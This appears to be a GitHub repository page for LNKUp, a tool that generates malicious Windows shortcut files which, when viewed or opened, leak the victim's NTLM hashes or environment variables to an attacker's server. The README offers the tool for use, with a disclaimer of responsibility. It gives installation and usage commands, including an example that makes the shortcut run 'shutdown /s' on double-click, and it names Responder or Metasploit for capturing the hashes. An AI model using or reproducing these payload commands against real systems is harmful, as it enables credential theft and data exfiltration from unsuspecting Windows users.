Generates malicious LNK file payloads for data exfiltration
Clone or download
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md Added gotchas and contact info to README Aug 14, 2017
generate.py Fixed clickthrough action and improved UNC leaks Aug 21, 2017
requirements.txt Slight helpdoc fix, added requirements.txt Aug 14, 2017

README.md

LNKUp

LNK Data exfiltration payload generator

This tool will allow you to generate LNK payloads. Upon rendering or being run, they will exfiltrate data.

Info

I am not responsible for any actions you take with this tool!
You can contact me with any questions by opening an issue, or via my Twitter, @Plazmaz.

Known gotchas

  • This tool will not work on OSX or Linux machines. It is specifically designed to target windows.
  • There may be issues with icon caching in some situations. If your payload doesn't execute after the first time, try regenerating it.
  • You will need to run a responder or metasploit module server to capture NTLM hashes.
  • To capture environment variables, you'll need to run a webserver like apache, nginx, or even just this

Installation

Install requirements using
pip install -r requirements.txt

Usage

Payload types:

  • NTLM
  • Environment
    • Steals the user's environment variables.
    • Examples: %PATH%, %USERNAME%, etc
    • Requires variables to be set using --vars
    • Example usage:
      lnkup.py --host localhost --type environment --vars PATH USERNAME JAVA_HOME --output out.lnk

Extra:

  • Use --execute to specify a command to run when the shortcut is double clicked
    • Example:
      lnkup.py --host localhost --type ntlm --output out.lnk --execute "shutdown /s"